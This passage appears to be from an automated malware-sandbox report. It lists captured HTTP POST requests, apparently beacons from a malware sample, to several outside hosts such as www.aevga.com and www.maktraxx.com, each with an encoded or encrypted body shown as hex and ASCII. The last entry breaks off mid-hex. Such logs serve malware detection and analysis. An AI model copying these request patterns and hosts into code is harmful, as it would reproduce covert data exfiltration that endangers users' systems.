                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 59 47 53 71 6c 53 53 5a 79 59 62 30 65 4c 65 4f 76 78 49 30 58 50 63 7a 54 33 48 63 36 47 4a 73 6d 43 68 63 6b 6b 31 63 62 34 70 5a 41 37 49 4d 2f 62 6a 59 32 4d 35 4f 56 67 48 35 50 6a 46 34 31 4f 36 6d 45 52 51 59 57 55 72 4a 64 35 67 6d 42 50 34 4f 71 5a 76 75 68 69 6c 48 47 2f 4c 64 41 4e 65 76 61 6d 64 44 35 78 75 6d 79 58 52 66 6a 62 6f 4b 32 4c 71 68 35 6f 68 33 73 47 43 46 7a 33 50 58 69 41 55 57 4f 49 75 64 6c 6a 75 72 75 4c 7a 30 37 42 6f 49 56 43 46 6f 55 30 78 38 69 6f 47 46 75 7a 4d 4e 56 73 43 70 39 2f 65 47 65 77 5a 71 4c 35 36 4e 77 6a 37 46 4b 6d 4f 36 37 64 30 77 32 47 68 57 31 35 4d 66 5a 6a 75 73 4b 6b 74 56 66 4c 4c 4e 4c 2b 68 36 32 59 65 67 38 36 6f 69 77 57 61 48 54 71 58 34 38 37 70 39 62 44 34 52 4c 53 34 73 76 56 44 72 66 5a 74 65 61 52 44 51 73 37 59 7a 48 37 6e 58 44 58 5a 36 69 59 4b 59 78 4b 6f 66 62 31 61 32 32 4c 6c 4b 57 59 4e 68 72 41 46 31 42 4b 62 54 61 74 7a 50 62 70 4d 68 6f 62 47 2b 57 70 56 52 78 31 32 56 68 46 76 42 61 41 54 38 65 33 77 4b 34 43 79 35 31 4b 30 59 31 6c 61 4b 4a 46 72 35 39 78 48 7a 33 46 4b 74 42 43 72 33 36 51 78 59 59 48 70 35 58 57 55 6f 59 4f 48 6c 4e 57 71 62 36 2b 4d 68 30 4d 44 4f 6e 58 7a 62 50 42 53 70 33 41 7a 51 44 7a 37 73 76 6a 33 48 53 7a 62 6e 49 36 67 30 4d 68 4e 33 49 43 68 78 49 58 6f 65 41 4c 5a 6a 4d 62 62 36 46 63 2f 55 56 33 2f 6c 50 30 6e 72 61 2b 5a 54 4b 73 2f 76 55 71 49 75 7a 67 4f 61 79 61 32 75 4d 39 63 71 56 4c 47 49 49 32 69 76 39 41 49 54 31 61 75 6f 51 58 5a 49 30 72 69 56 73 6b 37 34 72 4d 36 6d 4a 6a 37 4d 47 55 32 46 6e 51 7a 4f 61 39 71 44 51 64 4d 6c 2f 32 57 37 34 52 4c 61 37 4b 32 2b 48 39 50 5a 4b 42 72 39 67 78 62 42 4a 49 77 31 6e 78 6d 70 6c 7a 32 38 48 76 6d 44 78 50 65 61 51 43 2f 52 2b 2b 30 74 49 4c 32 32 33 63 72 5a 2b 67 41 3d Data Ascii: YGSqlSSZyYb0eLeOvxI0XPczT3Hc6GJsmChckk1cb4pZA7IM/bjY2M5OVgH5PjF41O6mERQYWUrJd5gmBP4OqZvuhilHG/LdANevamdD5xumyXRfjboK2Lqh5oh3sGCFz3PXiAUWOIudljuruLz07BoIVCFoU0x8ioGFuzMNVsCp9/eGewZqL56Nwj7FKmO67d0w2GhW15MfZjusKktVfLLNL+h62Yeg86oiwWaHTqX487p9bD4RLS4svVDrfZteaRDQs7YzH7nXDXZ6iYKYxKofb1a22LlKWYNhrAF1BKbTatzPbpMhobG+WpVRx12VhFvBaAT8e3wK4Cy51K0Y1laKJFr59xHz3FKtBCr36QxYYHp5XWUoYOHlNWqb6+Mh0MDOnXzbPBSp3AzQDz7svj3HSzbnI6g0MhN3IChxIXoeALZjMbb6Fc/UV3/lP0nra+ZTKs/vUqIuzgOaya2uM9cqVLGII2iv9AIT1auoQXZI0riVsk74rM6mJj7MGU2FnQzOa9qDQdMl/2W74RLa7K2+H9PZKBr9gxbBJIw1nxmplz28HvmDxPeaQC/R++0tIL223crZ+gA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 59 47 53 71 6c 53 53 5a 79 59 62 30 65 4c 65 4f 76 78 49 30 58 50 63 7a 54 33 48 63 36 47 4a 73 6d 43 68 63 6b 6b 31 63 62 34 70 5a 41 37 49 4d 2f 62 6a 59 32 4d 35 4f 56 67 48 35 50 6a 46 34 31 4f 36 6d 45 52 51 59 57 55 72 4a 64 35 67 6d 42 50 34 4f 71 5a 76 75 68 69 6c 48 47 2f 4c 64 41 4e 65 76 61 6d 64 44 35 78 75 6d 79 58 52 66 6a 62 6f 4b 32 4c 71 68 35 6f 68 33 73 47 43 46 7a 33 50 58 69 41 55 57 4f 49 75 64 6c 6a 75 72 75 4c 7a 30 37 42 6f 49 56 43 46 6f 55 30 78 38 69 6f 47 46 75 7a 4d 4e 56 73 43 70 39 2f 65 47 65 77 5a 71 4c 35 36 4e 77 6a 37 46 4b 6d 4f 36 37 64 30 77 32 47 68 57 31 35 4d 66 5a 6a 75 73 4b 6b 74 56 66 4c 4c 4e 4c 2b 68 36 32 59 65 67 38 36 6f 69 77 57 61 48 54 71 58 34 38 37 70 39 62 44 34 52 4c 53 34 73 76 56 44 72 66 5a 74 65 61 52 44 51 73 37 59 7a 48 37 6e 58 44 58 5a 36 69 59 4b 59 78 4b 6f 66 62 31 61 32 32 4c 6c 4b 57 59 4e 68 72 41 46 31 42 4b 62 54 61 74 7a 50 62 70 4d 68 6f 62 47 2b 57 70 56 52 78 31 32 56 68 46 76 42 61 41 54 38 65 33 77 4b 34 43 79 35 31 4b 30 59 31 6c 61 4b 4a 46 72 35 39 78 48 7a 33 46 4b 74 42 43 72 33 36 51 78 59 59 48 70 35 58 57 55 6f 59 4f 48 6c 4e 57 71 62 36 2b 4d 68 30 4d 44 4f 6e 58 7a 62 50 42 53 70 33 41 7a 51 44 7a 37 73 76 6a 33 48 53 7a 62 6e 49 36 67 30 4d 68 4e 33 49 43 68 78 49 58 6f 65 41 4c 5a 6a 4d 62 62 36 46 63 2f 55 56 33 2f 6c 50 30 6e 72 61 2b 5a 54 4b 73 2f 76 55 71 49 75 7a 67 4f 61 79 61 32 75 4d 39 63 71 56 4c 47 49 49 32 69 76 39 41 49 54 31 61 75 6f 51 58 5a 49 30 72 69 56 73 6b 37 34 72 4d 36 6d 4a 6a 37 4d 47 55 32 46 6e 51 7a 4f 61 39 71 44 51 64 4d 6c 2f 32 57 37 34 52 4c 61 37 4b 32 2b 48 39 50 5a 4b 42 72 39 67 78 62 42 4a 49 77 31 6e 78 6d 70 6c 7a 32 38 48 76 6d 44 78 50 65 61 51 43 2f 52 2b 2b 30 74 49 4c 32 32 33 63 72 5a 2b 67 41 3d Data Ascii: YGSqlSSZyYb0eLeOvxI0XPczT3Hc6GJsmChckk1cb4pZA7IM/bjY2M5OVgH5PjF41O6mERQYWUrJd5gmBP4OqZvuhilHG/LdANevamdD5xumyXRfjboK2Lqh5oh3sGCFz3PXiAUWOIudljuruLz07BoIVCFoU0x8ioGFuzMNVsCp9/eGewZqL56Nwj7FKmO67d0w2GhW15MfZjusKktVfLLNL+h62Yeg86oiwWaHTqX487p9bD4RLS4svVDrfZteaRDQs7YzH7nXDXZ6iYKYxKofb1a22LlKWYNhrAF1BKbTatzPbpMhobG+WpVRx12VhFvBaAT8e3wK4Cy51K0Y1laKJFr59xHz3FKtBCr36QxYYHp5XWUoYOHlNWqb6+Mh0MDOnXzbPBSp3AzQDz7svj3HSzbnI6g0MhN3IChxIXoeALZjMbb6Fc/UV3/lP0nra+ZTKs/vUqIuzgOaya2uM9cqVLGII2iv9AIT1auoQXZI0riVsk74rM6mJj7MGU2FnQzOa9qDQdMl/2W74RLa7K2+H9PZKBr9gxbBJIw1nxmplz28HvmDxPeaQC/R++0tIL223crZ+gA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 59 47 53 71 6c 53 53 5a 79 59 62 30 65 4c 65 4f 76 78 49 30 58 50 63 7a 54 33 48 63 36 47 4a 73 6d 43 68 63 6b 6b 31 63 62 34 70 5a 41 37 49 4d 2f 62 6a 59 32 4d 35 4f 56 67 48 35 50 6a 46 34 31 4f 36 6d 45 52 51 59 57 55 72 4a 64 35 67 6d 42 50 34 4f 71 5a 76 75 68 69 6c 48 47 2f 4c 64 41 4e 65 76 61 6d 64 44 35 78 75 6d 79 58 52 66 6a 62 6f 4b 32 4c 71 68 35 6f 68 33 73 47 43 46 7a 33 50 58 69 41 55 57 4f 49 75 64 6c 6a 75 72 75 4c 7a 30 37 42 6f 49 56 43 46 6f 55 30 78 38 69 6f 47 46 75 7a 4d 4e 56 73 43 70 39 2f 65 47 65 77 5a 71 4c 35 36 4e 77 6a 37 46 4b 6d 4f 36 37 64 30 77 32 47 68 57 31 35 4d 66 5a 6a 75 73 4b 6b 74 56 66 4c 4c 4e 4c 2b 68 36 32 59 65 67 38 36 6f 69 77 57 61 48 54 71 58 34 38 37 70 39 62 44 34 52 4c 53 34 73 76 56 44 72 66 5a 74 65 61 52 44 51 73 37 59 7a 48 37 6e 58 44 58 5a 36 69 59 4b 59 78 4b 6f 66 62 31 61 32 32 4c 6c 4b 57 59 4e 68 72 41 46 31 42 4b 62 54 61 74 7a 50 62 70 4d 68 6f 62 47 2b 57 70 56 52 78 31 32 56 68 46 76 42 61 41 54 38 65 33 77 4b 34 43 79 35 31 4b 30 59 31 6c 61 4b 4a 46 72 35 39 78 48 7a 33 46 4b 74 42 43 72 33 36 51 78 59 59 48 70 35 58 57 55 6f 59 4f 48 6c 4e 57 71 62 36 2b 4d 68 30 4d 44 4f 6e 58 7a 62 50 42 53 70 33 41 7a 51 44 7a 37 73 76 6a 33 48 53 7a 62 6e 49 36 67 30 4d 68 4e 33 49 43 68 78 49 58 6f 65 41 4c 5a 6a 4d 62 62 36 46 63 2f 55 56 33 2f 6c 50 30 6e 72 61 2b 5a 54 4b 73 2f 76 55 71 49 75 7a 67 4f 61 79 61 32 75 4d 39 63 71 56 4c 47 49 49 32 69 76 39 41 49 54 31 61 75 6f 51 58 5a 49 30 72 69 56 73 6b 37 34 72 4d 36 6d 4a 6a 37 4d 47 55 32 46 6e 51 7a 4f 61 39 71 44 51 64 4d 6c 2f 32 57 37 34 52 4c 61 37 4b 32 2b 48 39 50 5a 4b 42 72 39 67 78 62 42 4a 49 77 31 6e 78 6d 70 6c 7a 32 38 48 76 6d 44 78 50 65 61 51 43 2f 52 2b 2b 30 74 49 4c 32 32 33 63 72 5a 2b 67 41 3d Data Ascii: YGSqlSSZyYb0eLeOvxI0XPczT3Hc6GJsmChckk1cb4pZA7IM/bjY2M5OVgH5PjF41O6mERQYWUrJd5gmBP4OqZvuhilHG/LdANevamdD5xumyXRfjboK2Lqh5oh3sGCFz3PXiAUWOIudljuruLz07BoIVCFoU0x8ioGFuzMNVsCp9/eGewZqL56Nwj7FKmO67d0w2GhW15MfZjusKktVfLLNL+h62Yeg86oiwWaHTqX487p9bD4RLS4svVDrfZteaRDQs7YzH7nXDXZ6iYKYxKofb1a22LlKWYNhrAF1BKbTatzPbpMhobG+WpVRx12VhFvBaAT8e3wK4Cy51K0Y1laKJFr59xHz3FKtBCr36QxYYHp5XWUoYOHlNWqb6+Mh0MDOnXzbPBSp3AzQDz7svj3HSzbnI6g0MhN3IChxIXoeALZjMbb6Fc/UV3/lP0nra+ZTKs/vUqIuzgOaya2uM9cqVLGII2iv9AIT1auoQXZI0riVsk74rM6mJj7MGU2FnQzOa9qDQdMl/2W74RLa7K2+H9PZKBr9gxbBJIw1nxmplz28HvmDxPeaQC/R++0tIL223crZ+gA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 59 47 53 71 6c 53 53 5a 79 59 62 30 65 4c 65 4f 76 78 49 30 58 50 63 7a 54 33 48 63 36 47 4a 73 6d 43 68 63 6b 6b 31 63 62 34 70 5a 41 37 49 4d 2f 62 6a 59 32 4d 35 4f 56 67 48 35 50 6a 46 34 31 4f 36 6d 45 52 51 59 57 55 72 4a 64 35 67 6d 42 50 34 4f 71 5a 76 75 68 69 6c 48 47 2f 4c 64 41 4e 65 76 61 6d 64 44 35 78 75 6d 79 58 52 66 6a 62 6f 4b 32 4c 71 68 35 6f 68 33 73 47 43 46 7a 33 50 58 69 41 55 57 4f 49 75 64 6c 6a 75 72 75 4c 7a 30 37 42 6f 49 56 43 46 6f 55 30 78 38 69 6f 47 46 75 7a 4d 4e 56 73 43 70 39 2f 65 47 65 77 5a 71 4c 35 36 4e 77 6a 37 46 4b 6d 4f 36 37 64 30 77 32 47 68 57 31 35 4d 66 5a 6a 75 73 4b 6b 74 56 66 4c 4c 4e 4c 2b 68 36 32 59 65 67 38 36 6f 69 77 57 61 48 54 71 58 34 38 37 70 39 62 44 34 52 4c 53 34 73 76 56 44 72 66 5a 74 65 61 52 44 51 73 37 59 7a 48 37 6e 58 44 58 5a 36 69 59 4b 59 78 4b 6f 66 62 31 61 32 32 4c 6c 4b 57 59 4e 68 72 41 46 31 42 4b 62 54 61 74 7a 50 62 70 4d 68 6f 62 47 2b 57 70 56 52 78 31 32 56 68 46 76 42 61 41 54 38 65 33 77 4b 34 43 79 35 31 4b 30 59 31 6c 61 4b 4a 46 72 35 39 78 48 7a 33 46 4b 74 42 43 72 33 36 51 78 59 59 48 70 35 58 57 55 6f 59 4f 48 6c 4e 57 71 62 36 2b 4d 68 30 4d 44 4f 6e 58 7a 62 50 42 53 70 33 41 7a 51 44 7a 37 73 76 6a 33 48 53 7a 62 6e 49 36 67 30 4d 68 4e 33 49 43 68 78 49 58 6f 65 41 4c 5a 6a 4d 62 62 36 46 63 2f 55 56 33 2f 6c 50 30 6e 72 61 2b 5a 54 4b 73 2f 76 55 71 49 75 7a 67 4f 61 79 61 32 75 4d 39 63 71 56 4c 47 49 49 32 69 76 39 41 49 54 31 61 75 6f 51 58 5a 49 30 72 69 56 73 6b 37 34 72 4d 36 6d 4a 6a 37 4d 47 55 32 46 6e 51 7a 4f 61 39 71 44 51 64 4d 6c 2f 32 57 37 34 52 4c 61 37 4b 32 2b 48 39 50 5a 4b 42 72 39 67 78 62 42 4a 49 77 31 6e 78 6d 70 6c 7a 32 38 48 76 6d 44 78 50 65 61 51 43 2f 52 2b 2b 30 74 49 4c 32 32 33 63 72 5a 2b 67 41 3d Data Ascii: YGSqlSSZyYb0eLeOvxI0XPczT3Hc6GJsmChckk1cb4pZA7IM/bjY2M5OVgH5PjF41O6mERQYWUrJd5gmBP4OqZvuhilHG/LdANevamdD5xumyXRfjboK2Lqh5oh3sGCFz3PXiAUWOIudljuruLz07BoIVCFoU0x8ioGFuzMNVsCp9/eGewZqL56Nwj7FKmO67d0w2GhW15MfZjusKktVfLLNL+h62Yeg86oiwWaHTqX487p9bD4RLS4svVDrfZteaRDQs7YzH7nXDXZ6iYKYxKofb1a22LlKWYNhrAF1BKbTatzPbpMhobG+WpVRx12VhFvBaAT8e3wK4Cy51K0Y1laKJFr59xHz3FKtBCr36QxYYHp5XWUoYOHlNWqb6+Mh0MDOnXzbPBSp3AzQDz7svj3HSzbnI6g0MhN3IChxIXoeALZjMbb6Fc/UV3/lP0nra+ZTKs/vUqIuzgOaya2uM9cqVLGII2iv9AIT1auoQXZI0riVsk74rM6mJj7MGU2FnQzOa9qDQdMl/2W74RLa7K2+H9PZKBr9gxbBJIw1nxmplz28HvmDxPeaQC/R++0tIL223crZ+gA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 62 4c 72 68 42 55 4f 4f 31 59 61 35 4d 6d 47 36 53 74 36 41 45 47 77 6c 45 79 33 70 43 63 49 42 4a 2f 6a 34 56 62 73 4f 49 56 55 61 70 59 59 6e 78 74 72 65 63 72 76 73 6e 58 6d 49 42 32 74 56 55 30 75 41 4b 45 66 36 49 30 79 58 6b 61 2b 50 55 49 66 4d 66 65 4a 39 52 49 58 78 43 30 79 56 73 77 68 4a 37 6d 39 6f 68 4d 54 6a 68 4c 4c 77 35 69 42 77 62 49 32 45 62 63 42 46 6c 6e 52 4a 53 64 6c 78 67 54 78 73 30 71 57 39 6b 75 6f 5a 37 79 4c 54 62 70 4d 71 52 61 58 4f 73 57 54 44 56 79 30 4a 62 76 45 6d 71 2b 42 64 38 34 42 34 67 46 34 50 51 43 54 77 66 74 64 37 6a 56 7a 69 61 5a 54 50 6f 50 39 53 4a 55 59 44 43 71 4e 38 37 33 43 4b 6f 4a 32 30 4a 55 42 44 74 55 43 4b 52 70 6b 73 65 34 75 58 65 4e 50 59 65 34 79 71 38 2f 67 49 37 74 7a 6b 50 4d 76 53 4f 32 4a 4d 4b 4d 35 43 53 4e 66 7a 68 74 38 73 73 48 57 73 38 73 39 65 73 2f 5a 2b 50 37 53 35 4d 6c 73 70 63 74 61 67 4d 44 68 63 5a 57 41 4e 57 4c 64 45 6e 43 76 41 2b 6d 36 46 4d 51 53 70 42 6d 78 2f 68 45 52 36 56 73 2b 69 36 4c 58 49 50 57 76 6d 79 4a 4f 4a 54 58 72 4f 48 62 69 74 77 58 75 66 4c 44 5a 50 49 50 41 48 4f 4c 7a 4c 65 37 63 32 59 62 6f 4d 66 4a 73 39 39 35 33 46 6b 38 73 47 66 63 72 4c 58 32 5a 4a 6f 4f 72 6e 68 62 52 59 2f 73 33 6e 74 6c 53 33 5a 69 48 6c 70 2f 6a 56 42 30 71 76 6d 31 69 47 75 42 59 75 69 77 75 59 51 74 62 64 6a 4a 42 68 63 65 56 64 51 32 68 67 64 75 59 41 56 47 64 39 36 4c 38 6d 67 37 45 51 49 76 50 49 66 6e 37 2f 62 71 6a 72 74 6b 55 75 44 42 56 77 6a 6b 30 47 66 4a 49 66 6a 54 50 39 4c 6c 56 42 38 4f 37 56 32 46 69 31 47 73 38 49 63 52 6a 77 35 67 77 75 4a 46 62 43 6a 55 71 63 46 39 37 54 6d 74 37 6e 39 32 35 79 7a 71 6b 33 79 61 76 6f 62 56 6e 73 4c 67 3d 3d Data Ascii: bLrhBUOO1Ya5MmG6St6AEGwlEy3pCcIBJ/j4VbsOIVUapYYnxtrecrvsnXmIB2tVU0uAKEf6I0yXka+PUIfMfeJ9RIXxC0yVswhJ7m9ohMTjhLLw5iBwbI2EbcBFlnRJSdlxgTxs0qW9kuoZ7yLTbpMqRaXOsWTDVy0JbvEmq+Bd84B4gF4PQCTwftd7jVziaZTPoP9SJUYDCqN873CKoJ20JUBDtUCKRpkse4uXeNPYe4yq8/gI7tzkPMvSO2JMKM5CSNfzht8ssHWs8s9es/Z+P7S5MlspctagMDhcZWANWLdEnCvA+m6FMQSpBmx/hER6Vs+i6LXIPWvmyJOJTXrOHbitwXufLDZPIPAHOLzLe7c2YboMfJs9953Fk8sGfcrLX2ZJoOrnhbRY/s3ntlS3ZiHlp/jVB0qvm1iGuBYuiwuYQtbdjJBhceVdQ2hgduYAVGd96L8mg7EQIvPIfn7/bqjrtkUuDBVwjk0GfJIfjTP9LlVB8O7V2Fi1Gs8IcRjw5gwuJFbCjUqcF97Tmt7n925yzqk3yavobVnsLg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 36 54 32 43 43 42 71 6b 31 59 61 33 51 68 37 37 50 61 51 30 4f 31 33 55 41 6b 30 4b 46 76 67 31 37 68 39 59 53 37 2f 78 69 4f 36 49 76 6d 64 5a 72 6c 62 38 30 65 6e 6d 7a 73 48 55 55 51 37 78 6a 73 51 75 6f 50 6a 4f 70 42 32 75 35 75 44 6e 6b 34 6e 4c 43 5a 54 4f 68 71 4e 49 55 6b 4c 69 41 45 5a 50 70 65 55 2f 64 74 6b 71 4f 42 64 49 62 4a 50 6a 57 70 35 53 31 6a 54 53 5a 32 42 38 44 71 37 4b 39 6b 6b 74 63 49 5a 54 45 77 5a 4d 6a 62 6f 6f 78 4f 66 74 36 4d 6c 55 38 2b 2f 4e 30 70 41 67 34 6c 69 59 41 55 59 6d 7a 50 65 42 53 39 35 61 46 58 79 73 2b 41 47 4a 72 76 6b 2b 30 6a 7a 54 69 63 48 72 6d 69 72 56 6e 48 79 32 38 73 58 57 59 30 52 30 42 6b 55 37 33 54 75 4f 2b 44 38 46 76 4f 47 6c 44 39 57 54 6b 38 49 48 79 4e 65 68 4c 39 31 4f 42 78 75 78 4c 49 41 61 78 6c 66 59 30 6f 48 59 46 77 32 5a 2f 74 2b 69 46 61 33 79 52 30 58 4f 34 70 36 67 69 55 38 76 36 6f 72 68 64 31 6f 69 77 43 6a 63 5a 52 4a 46 44 50 59 6e 4f 42 49 5a 2b 35 4c 48 67 63 31 54 61 78 75 5a 62 58 55 4c 51 72 33 63 2b 57 54 54 74 39 6c 67 33 69 41 53 4b 6b 43 42 4d 74 61 62 78 44 75 75 2b 41 64 2f 4e 49 70 6b 46 4e 67 68 59 70 37 6c 46 75 59 66 34 51 73 31 68 59 62 47 74 5a 59 36 55 7a 35 37 2b 63 74 4d 73 4f 5a 59 6f 67 44 43 2f 47 41 53 2b 35 59 45 2f 69 70 6d 6a 46 54 4b 6b 4b 75 36 2b 4f 61 79 38 4a 38 66 56 70 6d 39 35 31 31 52 66 68 72 48 6b 75 63 34 77 42 41 66 75 4a 66 69 5a 70 5a 44 48 70 71 59 35 33 31 76 4d 46 77 53 45 53 39 6e 53 4d 44 43 31 39 51 31 34 30 65 70 5a 75 53 69 71 36 37 75 4a 4e 2f 4e 76 62 54 67 56 62 56 52 32 35 78 30 43 73 4f 4d 33 6b 6b 36 70 39 43 31 52 61 31 74 53 78 42 79 6a 68 67 5a 54 34 34 70 37 31 74 5a 38 4c 48 44 6c 57 66 37 58 4d 7a 4a 68 56 58 64 4c 4d 4e 47 47 63 6b 30 6f 4d 34 43 70 77 4d 54 33 44 4a 39 34 77 4d 61 79 79 47 52 31 6c 7a 64 64 41 3d 3d Data Ascii: 6T2CCBqk1Ya3Qh77PaQ0O13UAk0KFvg17h9YS7/xiO6IvmdZrlb80enmzsHUUQ7xjsQuoPjOpB2u5uDnk4nLCZTOhqNIUkLiAEZPpeU/dtkqOBdIbJPjWp5S1jTSZ2B8Dq7K9kktcIZTEwZMjbooxOft6MlU8+/N0pAg4liYAUYmzPeBS95aFXys+AGJrvk+0jzTicHrmirVnHy28sXWY0R0BkU73TuO+D8FvOGlD9WTk8IHyNehL91OBxuxLIAaxlfY0oHYFw2Z/t+iFa3yR0XO4p6giU8v6orhd1oiwCjcZRJFDPYnOBIZ+5LHgc1TaxuZbXULQr3c+WTTt9lg3iASKkCBMtabxDuu+Ad/NIpkFNghYp7lFuYf4Qs1hYbGtZY6Uz57+ctMsOZYogDC/GAS+5YE/ipmjFTKkKu6+Oay8J8fVpm9511RfhrHkuc4wBAfuJfiZpZDHpqY531vMFwSES9nSMDC19Q140epZuSiq67uJN/NvbTgVbVR25x0CsOM3kk6p9C1Ra1tSxByjhgZT44p71tZ8LHDlWf7XMzJhVXdLMNGGck0oM4CpwMT3DJ94wMayyGR1lzddA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 52 70 44 75 39 35 46 71 33 59 62 64 65 47 73 50 4d 43 4a 4d 74 75 71 63 66 7a 68 50 7a 79 35 35 56 53 49 55 55 57 43 52 49 30 50 4d 56 36 38 58 4c 44 73 59 59 49 44 57 53 65 6b 4e 76 52 6b 59 56 39 64 43 38 2b 52 54 56 52 44 77 41 74 57 70 4c 33 33 47 72 7a 4d 4d 47 32 48 4a 63 41 32 30 72 75 71 46 30 33 6a 71 68 62 58 2b 4f 33 68 34 70 6e 53 69 67 6a 6f 50 66 78 35 55 4c 61 4b 43 55 32 65 72 58 34 4e 48 33 61 78 33 30 75 52 77 4f 52 36 6d 31 57 7a 39 30 71 2f 73 63 72 30 59 5a 61 6c 61 66 58 50 67 53 44 6e 51 63 51 4d 68 65 57 67 47 77 39 67 6c 79 70 44 54 4a 32 39 33 4f 67 48 61 69 69 37 72 61 4d 71 39 32 73 48 47 52 77 62 6c 67 6f 63 76 66 7a 6b 71 35 74 76 4b 39 56 46 61 33 68 4c 58 4d 32 6a 77 68 53 56 6d 64 46 74 38 52 49 44 6c 4e 73 2f 56 56 6f 4c 73 64 30 37 5a 49 6e 67 63 71 59 56 78 57 57 68 43 6d 70 4b 46 54 6c 46 62 6f 71 78 44 51 77 4a 79 44 35 6e 6a 4c 4d 72 63 61 53 76 6f 43 6b 55 47 37 7a 52 78 4c 73 4a 58 78 70 34 4d 33 6c 64 48 4a 62 49 63 59 34 53 64 41 4c 37 77 62 71 5a 61 4b 39 35 50 48 47 65 72 79 56 4a 67 38 2f 61 46 6d 4f 4d 69 73 6a 50 4d 4d 58 78 55 6d 50 6b 48 39 48 4e 55 71 77 34 36 4e 55 78 57 56 6d 4b 49 55 4e 73 49 49 58 52 6e 4a 72 46 4e 77 4d 4f 42 4b 39 5a 58 38 6f 76 2f 2f 48 36 6a 77 63 4c 4f 4f 77 45 35 46 59 32 48 78 7a 37 51 67 4a 51 6e 4e 48 6f 58 53 34 34 7a 68 51 55 73 47 75 58 77 49 76 6e 4f 51 6e 62 68 74 4e 37 68 63 2f 62 42 43 6b 53 37 37 58 54 48 53 75 2f 70 6f 36 35 4e 43 78 4c 35 4c 6f 49 47 51 39 45 67 70 4c 34 4e 31 38 53 50 6f 6e 52 4e 58 6f 69 37 73 68 6b 43 67 61 49 63 65 53 30 6a 4a 55 77 38 6e 57 6a 64 42 76 51 68 50 4b 39 65 63 57 72 52 41 56 42 42 48 51 74 62 4a 36 45 3d Data Ascii: RpDu95Fq3YbdeGsPMCJMtuqcfzhPzy55VSIUUWCRI0PMV68XLDsYYIDWSekNvRkYV9dC8+RTVRDwAtWpL33GrzMMG2HJcA20ruqF03jqhbX+O3h4pnSigjoPfx5ULaKCU2erX4NH3ax30uRwOR6m1Wz90q/scr0YZalafXPgSDnQcQMheWgGw9glypDTJ293OgHaii7raMq92sHGRwblgocvfzkq5tvK9VFa3hLXM2jwhSVmdFt8RIDlNs/VVoLsd07ZIngcqYVxWWhCmpKFTlFboqxDQwJyD5njLMrcaSvoCkUG7zRxLsJXxp4M3ldHJbIcY4SdAL7wbqZaK95PHGeryVJg8/aFmOMisjPMMXxUmPkH9HNUqw46NUxWVmKIUNsIIXRnJrFNwMOBK9ZX8ov//H6jwcLOOwE5FY2Hxz7QgJQnNHoXS44zhQUsGuXwIvnOQnbhtN7hc/bBCkS77XTHSu/po65NCxL5LoIGQ9EgpL4N18SPonRNXoi7shkCgaIceS0jJUw8nWjdBvQhPK9ecWrRAVBBHQtbJ6E=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 38 71 79 79 4a 6a 74 78 49 59 66 49 34 37 77 48 30 6a 55 43 65 79 51 66 2f 5a 4a 42 52 49 4e 6c 6e 78 62 35 2b 57 79 42 57 42 79 77 62 72 72 6f 64 68 6a 6c 41 52 5a 6f 64 38 78 33 78 6e 52 37 48 52 79 44 4f 53 38 69 55 55 6a 4b 4f 44 2f 75 41 64 4f 61 78 63 61 35 38 56 4e 74 33 4d 46 68 52 2b 30 6f 52 51 70 38 59 61 36 6f 37 4a 68 4f 4f 2b 34 48 34 46 55 51 55 71 37 5a 54 4d 59 47 57 56 56 72 78 39 71 63 64 74 38 55 75 6e 78 68 2f 6e 42 49 55 33 57 4e 74 6e 63 6b 45 4b 72 31 2b 31 56 72 31 48 47 58 69 5a 4b 63 38 4f 53 74 72 6d 78 6e 48 44 38 77 55 52 70 67 6f 33 78 75 31 4e 50 39 4c 44 42 46 61 31 53 43 78 2b 48 44 41 66 36 6f 2b 74 6c 4d 62 7a 38 2b 31 4a 52 36 51 32 34 69 78 54 76 2b 55 39 2f 79 37 30 42 72 31 6b 5a 4e 34 77 52 52 32 34 37 32 38 6f 70 6c 51 76 53 75 2f 6f 74 78 74 46 35 4c 78 4c 58 52 57 45 32 56 39 46 4f 33 4c 6c 77 63 48 4d 38 4a 6f 4a 63 5a 56 4c 30 4c 74 36 66 6a 70 75 59 4b 66 58 68 57 43 72 34 2b 44 4b 36 6a 6b 56 37 58 79 78 4c 38 68 30 6b 49 42 46 4e 66 6e 6f 2b 69 6f 45 32 79 43 33 6d 44 77 6f 6c 42 33 79 34 2b 5a 49 51 6e 6b 52 79 64 33 38 59 57 6d 6c 39 76 43 32 65 48 30 63 48 4b 55 35 49 78 78 6d 6f 54 61 56 